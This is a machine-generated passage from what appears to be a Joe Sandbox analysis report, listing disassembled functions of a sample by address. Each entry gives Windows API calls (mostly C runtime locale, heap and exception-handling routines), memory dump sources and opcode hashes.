                                                                                                                                                                                                                                        • Opcode ID: 5f923dbb4ce455124ba230541b309d39fedf8a085d6b4b8a481a24a418028b5a
                                                                                                                                                                                                                                        • Instruction ID: 9b92c9081b916837c2977ee30bb5f1156b96752c17f400d4cd07f7daec6e1657
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f923dbb4ce455124ba230541b309d39fedf8a085d6b4b8a481a24a418028b5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92F0B4316312266EAB23AF66DC09BEA3F58AB417E0B154113AC09A7194CFB0DC2086A0
                                                                                                                                                                                                                                        Function 002BA8D1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,002BC8AA,?,?,002BC8AA,00000220,?,00000000,?), ref: 002BA903
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 9ab3992e9a07033b6857294f31727158fd0ec7ae60f1acdb7b7e9cc45259969c
                                                                                                                                                                                                                                        • Instruction ID: fb26acc77350de1b9d214bb4c50f162c6bb00222541f257f1984102796a8fcd5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ab3992e9a07033b6857294f31727158fd0ec7ae60f1acdb7b7e9cc45259969c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E0E53153162766D7302B65EC09BDB77589B413F0F160021EC0596490EE60CD7095A2

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 002BFBD2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 002BFCDA
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 002BFD18
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 002BFD2B
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002BFD73
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002BFD8E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID: l#-
                                                                                                                                                                                                                                        • API String ID: 415426439-1174061122
                                                                                                                                                                                                                                        • Opcode ID: 68b1b7023880115e490f9c972bd5547015d35a364f58b9c61d8f96844efb37d3
                                                                                                                                                                                                                                        • Instruction ID: 2cf4e852554080a4c3d2c87c262529d6c3baab2c87887822b74bc044dea2082b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68b1b7023880115e490f9c972bd5547015d35a364f58b9c61d8f96844efb37d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA517072A2020AAFDB50DFA5DD45BFAB7B8BF04740F14457AE900E7191E770DA608B61
                                                                                                                                                                                                                                        Function 002C6362 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                        • Opcode ID: 91c2dcbb8f8aa50f2608dfd62c65f34526913e37ad7998fe4960a4735633d2ec
                                                                                                                                                                                                                                        • Instruction ID: eb78e09e6790a7cb8173da7bee2924620db95ad92f6dcb33745d803249e044e0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91c2dcbb8f8aa50f2608dfd62c65f34526913e37ad7998fe4960a4735633d2ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13D24971E286298FDB64CE28CC44BEAB7B5EB44344F1442EED40DE7240DB78AE958F41
                                                                                                                                                                                                                                        Function 002C0337 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03D0
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03F9
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,002BFD08,?,00000000), ref: 002C040E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: 8ffb384c85dcb8e51ac89edea683d46281f9cf943493bf015496a89c230dcde5
                                                                                                                                                                                                                                        • Instruction ID: 0c50fef38c3fc7d449497c65fdc70dc6289659413f9d5f18a340ea6ecfd5be6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ffb384c85dcb8e51ac89edea683d46281f9cf943493bf015496a89c230dcde5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0321C422A20246EBDB34CF14C884F9B73A6AF54B54B5682ADE90AE7101E732DE50C390
                                                                                                                                                                                                                                        Function 002B8900 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                        • Instruction ID: 4c1107ecee76cf71415ea72be9a9774ed45dd03c38f32283a58cd8aaa95c0618
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22022E71E1121A9BDF14CFA8C8806EDBBF5FF48354F24826AD519E7381DB31A951CB90
                                                                                                                                                                                                                                        Function 002C0919 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C0A09
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                        • Opcode ID: e639649bf80f2f721fc4b0a07167e6b0747cdda87f2c2c256670522fe76f6431
                                                                                                                                                                                                                                        • Instruction ID: 2488791256b59bbe1b286f439779ab4f8efdd086614be3a8fd5e1fec34065f27
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e639649bf80f2f721fc4b0a07167e6b0747cdda87f2c2c256670522fe76f6431
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B71C1719152699FDF21EF68CCC9FAEBBB8AF05304F1442DDE048A3251DA314EA58F10
                                                                                                                                                                                                                                        Function 002AD86F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002AD87B
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 002AD947
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002AD960
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 002AD96A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                        • Opcode ID: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction ID: 5f0b3a1e9a69a5f7047e60f8f04b8c188a856ac32efe59ad1d8df2830a850a23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 723108B5D1521D9BDF21EFA4D8897CDBBB8AF08700F1041AAE40DAB250EB749B85CF45
                                                                                                                                                                                                                                        Function 002A6D70 Relevance: 5.5, Strings: 4, Instructions: 524COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$%$+$+
                                                                                                                                                                                                                                        • API String ID: 0-3555305375
                                                                                                                                                                                                                                        • Opcode ID: f0739bbda528c54f48d2546f26cb587137d74d9b97cb0acc8366c662c9fa0444
                                                                                                                                                                                                                                        • Instruction ID: 86854de3d3645dcbad7df9f171c004bae2561a0c7fac328d5ff322510c8f5fee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0739bbda528c54f48d2546f26cb587137d74d9b97cb0acc8366c662c9fa0444
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4322CB3052C7818FD315DF28C89476FBBE5AFCA344F148A1EE889872A1DB749994CB42
                                                                                                                                                                                                                                        Function 002A3E60 Relevance: 5.5, Strings: 4, Instructions: 504COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$%$+$+
                                                                                                                                                                                                                                        • API String ID: 0-3555305375
                                                                                                                                                                                                                                        • Opcode ID: 112c39388b4d43a9031758abf10ad2e1ef431344e8dba56d9edf71baa468ea44
                                                                                                                                                                                                                                        • Instruction ID: 213b29ebbf5dbf99ddf13e399a3c014a218d992465f31c61d25c31c077e3ca69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 112c39388b4d43a9031758abf10ad2e1ef431344e8dba56d9edf71baa468ea44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D212BD305287818FD715EF28C09136FBBE5AFCA344F208A1EE9C5472A1DBB5D994CB42
                                                                                                                                                                                                                                        Function 002BFEBE Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002BFF12
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002BFF5C
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C0022
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                                                                                        • Opcode ID: 068c5aefb0fe50afe00206cb7c2999ed3701eb809bb111a28ecf2560867cccc2
                                                                                                                                                                                                                                        • Instruction ID: 9c2bc2f06adead42ab99f77d9275f1f25d23e48bf84efc0b31158a56728fb7ce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 068c5aefb0fe50afe00206cb7c2999ed3701eb809bb111a28ecf2560867cccc2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5461AD71920217DFDB289F28DD82BBAB7A8EF04340F11817AE915D6681EB74DDA1CF50
                                                                                                                                                                                                                                        Function 002B695D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002B6A55
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002B6A5F
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 002B6A6C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                        • Opcode ID: d46f37b5c7bc9c25dc3738300e388eb9cf44fc637bf73b60ccfbb2c084afe417
                                                                                                                                                                                                                                        • Instruction ID: 2b4c09c72040663a69836163edf59c6b9c2960c26dfcf98212bc3ae1f1391d73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d46f37b5c7bc9c25dc3738300e388eb9cf44fc637bf73b60ccfbb2c084afe417
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331C274911229ABCB21DF68D8897CDBBB8AF08750F5085EAE408A6250EB349F958F44
                                                                                                                                                                                                                                        Function 002A1000 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strlen
                                                                                                                                                                                                                                        • String ID: Something
                                                                                                                                                                                                                                        • API String ID: 4218353326-2334896984
                                                                                                                                                                                                                                        • Opcode ID: d651f81b87be1771f0fa1cb38ad6f57b6c9428cddd1e74187be1e51be653dffa
                                                                                                                                                                                                                                        • Instruction ID: af101a951de28acfa01add3db3048ee3a68cacb55df488b42801c9d70c8e7c4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d651f81b87be1771f0fa1cb38ad6f57b6c9428cddd1e74187be1e51be653dffa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2711771A283155FC318DF69C88462BF7D6AFCA310F054A2DED459B341EA30E961CBD1
                                                                                                                                                                                                                                        Function 002AE170 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
